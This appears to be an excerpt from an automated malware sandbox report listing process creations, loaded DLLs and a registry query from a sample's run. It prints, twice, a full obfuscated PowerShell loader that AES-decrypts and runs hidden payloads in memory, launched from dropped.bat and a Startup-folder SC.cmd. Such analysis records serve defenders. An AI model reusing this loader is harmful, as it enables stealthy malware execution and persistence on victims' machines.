    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qungqkxv"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qungqkxv"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\bxtzrdixjge"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\dropped.batJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\dropped.bat';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qungqkxv"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qungqkxv"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\bxtzrdixjge"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var); $XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress); $OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){ $sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ = 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach ($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rstrtmgr.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rstrtmgr.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pstorec.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vaultcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pstorec.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
